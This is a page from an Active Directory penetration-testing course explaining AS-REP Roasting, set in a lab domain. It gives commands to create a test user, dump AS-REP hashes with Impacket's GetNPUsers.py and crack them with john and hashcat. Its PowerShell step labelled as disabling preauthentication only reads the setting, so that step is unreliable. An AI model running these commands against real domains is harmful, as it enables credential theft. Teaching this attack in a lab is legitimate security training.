7.2 - AS-REP Roasting

AS-REP Roasting

AS-REP Roasting exploits accounts for which Kerberos preauthentication is disabled. In a typical Kerberos authentication process, the client must send a timestamp encrypted with its password-derived key. This serves as proof that the authentication request is not being replayed.

However, if preauthentication is disabled, the client does not need to send this encrypted timestamp. As a result, an attacker can request a Ticket Granting Ticket (TGT) for the target user and receive an AS-REP message encrypted with the user’s password hash.

AS-REP Process

1) AS-REQ (Client -> KDC/AS)
   - Timestamp 🔑 Encrypted with Client key (only if preauthentication is enabled)

2) AS-REP (KDC/AS -> Client)
   - TGT 🔑 Encrypted with KDC key
   - TGS Session Key 🔑 Encrypted with Client key

In this case we can jump the first step because the preauth is disabled. Once an attacker captures the AS-REP, they can attempt to crack the user's password offline.

Example: Exploiting AS-REP Roasting

Step 1: Create a User

New-ADUser -Name "asrep" -SamAccountName "asrep" -UserPrincipalName "asrep@dev-angelist.lab" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true

Step 2: Disable Preauthentication

Win + R -> dsa.msc
User -> Properties -> Account -> Account Options -> Do not require Kerberos preauthentication

Or via PowerShell:

Get-ADUser -Identity "asrep" -Properties DoesNotRequirePreAuth | Select-Object Name, DoesNotRequirePreAuth

Step 3: Perform AS-REP Roasting using Impacket

#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Perform AS-REP Roasting attack using the Impacket's module: GetNPUsers.py
GetNPUsers.py dev-angelist.lab/asrep -dc-ip corp-dc -no-pass | grep '\$krb5asrep\$' > as-rep.txt

Step 4: Crack the Ticket

john --wordlist=/home/kali/Documents/password.txt ./as-rep.txt
hashcat -m 18200 ./as-rep.txt /home/kali/Documents/password.txt

Other Resources

Previous7.1 - Kerberos Intro Next7.3 - Kerberoasting

Last updated 1 month ago

1) AS-REQ (Client -> KDC/AS) - Timestamp 🔑 Encrypted with Client key (only if preauthentication is enabled) 2) AS-REP (KDC/AS -> Client) - TGT 🔑 Encrypted with KDC key - TGS Session Key 🔑 Encrypted with Client key

#On attacker machine create a dedicated python environment (optional) python3 -m venv venv . venv/bin/activate pip3 install impacket #Perform AS-REP Roasting attack using the Impacket's module: GetNPUsers.py GetNPUsers.py dev-angelist.lab/asrep -dc-ip corp-dc -no-pass | grep '\$krb5asrep\$' > as-rep.txt